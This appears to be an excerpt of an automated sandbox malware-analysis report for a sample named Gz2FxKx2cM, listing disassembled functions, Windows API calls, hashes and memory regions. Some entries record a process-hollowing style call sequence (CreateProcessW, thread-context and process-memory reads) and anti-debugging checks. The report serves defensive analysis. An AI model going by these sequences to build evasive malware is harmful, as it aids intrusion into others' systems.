                                          • Opcode Fuzzy Hash: 48134cd2b7ab51286b05b16c5bb8ab74bfefeb3ef81272bdff35fe460b47040e
                                          • Instruction Fuzzy Hash: E901F172295B31EBEA102738FC82B2E738C8BC2761F524429F8099A18EDE748D005761
                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00969548,?,?,?,?,?,00000004), ref: 009698BB
                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00969548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009698D1
                                          • CloseHandle.KERNEL32(00000000,?,00969548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009698D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: 156f920df4693da2e05f62b91939a197328dabd8b9e4989078d50629f7dd5545
                                          • Instruction ID: 036b7c341957320e6eb25dafb7e62f9f29cb662df6e2f538063b6e1a050183dd
                                          • Opcode Fuzzy Hash: 156f920df4693da2e05f62b91939a197328dabd8b9e4989078d50629f7dd5545
                                          • Instruction Fuzzy Hash: 7FE08632144214BBD7212B54EC0DFDA7B19EB06760F104120FB14A91E087B12521A798
                                          APIs
                                          • _free.LIBCMT ref: 00968D1B
                                            • Part of subcall function 00922D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00929A24), ref: 00922D69
                                            • Part of subcall function 00922D55: GetLastError.KERNEL32(00000000,?,00929A24), ref: 00922D7B
                                          • _free.LIBCMT ref: 00968D2C
                                          • _free.LIBCMT ref: 00968D3E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                          • Instruction ID: d4f176f448ed4cbf6d854f2720bff08ec190d14df138c44d0657968eab26459d
                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                          • Instruction Fuzzy Hash: A3E017B160162167CB24AAB8B950B9323EC4F9C352B140A1EB50DD71CACE64F8928178
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 638c7db248c770ca7bb956ba2ed8d2a059798f277704fdf2e3eaa791a014279f
                                          • Instruction ID: 1b9d51bd86438a7c79283672a67ff64ec420332ad8c113c2e573f9948cdca336
                                          • Opcode Fuzzy Hash: 638c7db248c770ca7bb956ba2ed8d2a059798f277704fdf2e3eaa791a014279f
                                          • Instruction Fuzzy Hash: 57225870A08311DFDB24DF14C494B6ABBE5BF84304F15896DE99A8B3A2D735EC45CB82
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: EA06
                                          • API String ID: 4104443479-3962188686
                                          • Opcode ID: 780c5232eeb5786e005bf352076b5986405060425777894675a20a047021838f
                                          • Instruction ID: 4baea00b0c3c040122db948c004053a2484d7b26e82469de02df5a0f395f7e9d
                                          • Opcode Fuzzy Hash: 780c5232eeb5786e005bf352076b5986405060425777894675a20a047021838f
                                          • Instruction Fuzzy Hash: 7841ADF1A001686FDF219B54D8617BE7FAA9F95300F284474EF86DB2C2D634AD4487A1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                          • Instruction ID: 2af2ee72ffdd4efc6f02e1ce6b7b3111e9d7be8dfa22b0e2ae1560de39e477d3
                                          • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                          • Instruction Fuzzy Hash: 633187B1B04606AFC714DFA8D8D1E69F3A9FF883207158629E519CB2D1EB34F950CB90
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 00904834
                                            • Part of subcall function 0092336C: __lock.LIBCMT ref: 00923372
                                            • Part of subcall function 0092336C: DecodePointer.KERNEL32(00000001,?,00904849,00957C74), ref: 0092337E
                                            • Part of subcall function 0092336C: EncodePointer.KERNEL32(?,?,00904849,00957C74), ref: 00923389
                                            • Part of subcall function 009048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00904915
                                            • Part of subcall function 009048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0090492A
                                            • Part of subcall function 00903B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00903B68
                                            • Part of subcall function 00903B3A: IsDebuggerPresent.KERNEL32 ref: 00903B7A
                                            • Part of subcall function 00903B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009C52F8,009C52E0,?,?), ref: 00903BEB
                                            • Part of subcall function 00903B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00903C6F
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00904874
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0
                                          • Opcode ID: 639e5364a827115d17563aeffcb8a6c956bfc6f9caad52a4e2b8faba652c205a
                                          • Instruction ID: 9f50d4a4230f1d9fd1664a4ec346a43f5343551e13a45d479083c3586c8debda
                                          • Opcode Fuzzy Hash: 639e5364a827115d17563aeffcb8a6c956bfc6f9caad52a4e2b8faba652c205a
                                          • Instruction Fuzzy Hash: 56119DB19183019FC700EF29E805A0AFBE8EFD4750F11891EF450832B2DB709A49DB92
                                          APIs
                                            • Part of subcall function 0092571C: __FF_MSGBANNER.LIBCMT ref: 00925733
                                            • Part of subcall function 0092571C: __NMSG_WRITE.LIBCMT ref: 0092573A
                                            • Part of subcall function 0092571C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000000,?,?,?,00920DD3,?), ref: 0092575F
                                          • std::exception::exception.LIBCMT ref: 00920DEC
                                          • __CxxThrowException@8.LIBCMT ref: 00920E01
                                            • Part of subcall function 0092859B: RaiseException.KERNEL32(?,?,?,009B9E78,00000000,?,?,?,?,00920E06,?,009B9E78,?,00000001), ref: 009285F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: 5b02d8ac4aab94b8606a4a9263fda6b3fd29fd441629022d01deea4ba9594014
                                          • Instruction ID: 82014a653d225089222d668e1945c814b98477375ff7d2d79f6beeda538597bf
                                          • Opcode Fuzzy Hash: 5b02d8ac4aab94b8606a4a9263fda6b3fd29fd441629022d01deea4ba9594014
                                          • Instruction Fuzzy Hash: 22F0A43550633976CB20BBA8FC05ADFB7AC9F81311F104865F908961D6DF719A80D2D1
                                          APIs
                                            • Part of subcall function 00928B28: __getptd_noexit.LIBCMT ref: 00928B28
                                          • __lock_file.LIBCMT ref: 009253EB
                                            • Part of subcall function 00926C11: __lock.LIBCMT ref: 00926C34
                                          • __fclose_nolock.LIBCMT ref: 009253F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: 9c719e8f34fbac3fa89617ba15610b017e6d2a0008bfd6d5e4d932e1cde90b3b
                                          • Instruction ID: 50791cbc8a9c3dd07745fe68021297c77494b6992b6ec1899b5d4f7807e73ec5
                                          • Opcode Fuzzy Hash: 9c719e8f34fbac3fa89617ba15610b017e6d2a0008bfd6d5e4d932e1cde90b3b
                                          • Instruction Fuzzy Hash: 42F0B431802A24DADB10FF75B8027AE77E06F81374F229248E464AB1C9CFFC89419B52
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01271C8B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01271D21
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01271D43
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                          • Instruction ID: c4593856acacf0072671b7566d9bcd6f5c36eb6f02d77b31c80f799b2f75326a
                                          • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                          • Instruction Fuzzy Hash: 8B12BD24A24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4F91CF5A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 2852f147e85a5645314e8ba2413c46b4966ed7d3e6e9104c597b703e60676932
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 3831B7B0A001159FC718DF58E484969FBA6FB99300B6487A5E88ACB35AD731EDC1DBC0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: d690eb0f9e1a2f097e06ca23a2e3992adf3ab2b18b572a444a4a3e4b9cced054
                                          • Instruction ID: 68a8ae3d89c41ab3e4082c892b2d9a933395af50f776106ab3f4214f1ceec5ed
                                          • Opcode Fuzzy Hash: d690eb0f9e1a2f097e06ca23a2e3992adf3ab2b18b572a444a4a3e4b9cced054
                                          • Instruction Fuzzy Hash: 0841FA745043519FDB24DF14C458B1ABBE1BF85314F0988ACE9998B7A2C735EC45CF92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 537858043f66051b4d359b2b29ec4505123abfafb87f4fc159f336fc7ef05951
                                          • Instruction ID: 18c7a4f1a7e30bdfb87d822feacb7cc9ac9f514966962659d02b497e054a62ce
                                          • Opcode Fuzzy Hash: 537858043f66051b4d359b2b29ec4505123abfafb87f4fc159f336fc7ef05951
                                          • Instruction Fuzzy Hash: F3214872A18A19EBDB108F51F84176DBBB4FF54360F21852DE886C51E0EB30D4D0DB01
                                          APIs
                                            • Part of subcall function 00904BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00904BEF
                                            • Part of subcall function 0092525B: __wfsopen.LIBCMT ref: 00925266
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00904E0F
                                            • Part of subcall function 00904B6A: FreeLibrary.KERNEL32(00000000), ref: 00904BA4
                                            • Part of subcall function 00904C70: _memmove.LIBCMT ref: 00904CBA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: c4494537dcfdf245409ae5c8001fe27ea858000a291c1b18daf2d2eee2a0578f
                                          • Instruction ID: 21de6837da40b671ed4e9835b80f67b3b64951997047e5278f4c8efdc67444e3
                                          • Opcode Fuzzy Hash: c4494537dcfdf245409ae5c8001fe27ea858000a291c1b18daf2d2eee2a0578f
                                          • Instruction Fuzzy Hash: 1D11E371640205AFCF14BF70D812FAD77A9AFC4B10F108829F746AB1C1DA759A019B90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: bf140a0f402adb2cbc4ef512011abdcb7f339601c10605743bab857599ca3558
                                          • Instruction ID: 3572b10278879f8db3d81e3aa33cb5cc38e72a4ced84f22b9e151354291e8745
                                          • Opcode Fuzzy Hash: bf140a0f402adb2cbc4ef512011abdcb7f339601c10605743bab857599ca3558
                                          • Instruction Fuzzy Hash: 692124B4908311DFDB24DF24C844B1ABBE0BF88314F05896CF98A577A2D731E845CB92
                                          APIs
                                          • __lock_file.LIBCMT ref: 009248A6
                                            • Part of subcall function 00928B28: __getptd_noexit.LIBCMT ref: 00928B28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: 693ee37772e2cd1f858a620bcbc7200713eba8cb73b512324075a96e685f10b9
                                          • Instruction ID: e2a1d0e6e9897afd261c49960105bcb20a3a6af73ca317adb007649d9a6ca231
                                          • Opcode Fuzzy Hash: 693ee37772e2cd1f858a620bcbc7200713eba8cb73b512324075a96e685f10b9
                                          • Instruction Fuzzy Hash: DEF02231812228EBDF11AFB0AC063EF36A4AF81324F008404F5209A2C9DB788950DB41
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,009C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00904E7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: bd7962e5eb0f3ef2b0ce12b097335437b9bd0a33c0099e2f1d7d88301c829956
                                          • Instruction ID: c07f2cd73c044eaea864b805e769649bee3afd0a5e7e0b28b488809c1b45dd7e
                                          • Opcode Fuzzy Hash: bd7962e5eb0f3ef2b0ce12b097335437b9bd0a33c0099e2f1d7d88301c829956
                                          • Instruction Fuzzy Hash: 70F06DB1505711CFCB349F64E498812BBF5BF543693208E3EE2D786660C732A880DF40
                                          APIs
                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009207B0
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: a6ea2a759c6c2c2dcc02e83239e1b024037783949122da56552d45bcc49be7ba
                                          • Instruction ID: 14cfec5cb7a1446fd106aaff301b6e76290f262ab46b380457839a89334c518d
                                          • Opcode Fuzzy Hash: a6ea2a759c6c2c2dcc02e83239e1b024037783949122da56552d45bcc49be7ba
                                          • Instruction Fuzzy Hash: EDE086369041285BC720D6989C05FEAB79DDBC87A0F0541B5FC0CD7254D960AC808690
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: 7dbc614dd8f102a8ada9eeefdbda033d1f7db80fb16d017d2c6de1fb673c19c9
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: B9B0927644020CB7CE012A82FC02B593B199B81764F408020FB1C181B2A673A6649A89
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 012724E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                          • Instruction ID: 3d072e5e03bea4d9b887be1740be63a2e7316d4785097e5375fab567c9e3087b
                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                          • Instruction Fuzzy Hash: 6FE0BF7494010EEFDB10EFA4D5496DE7BB4EF04301F1045A1FD05D7681DB309E549A62
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 012724E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
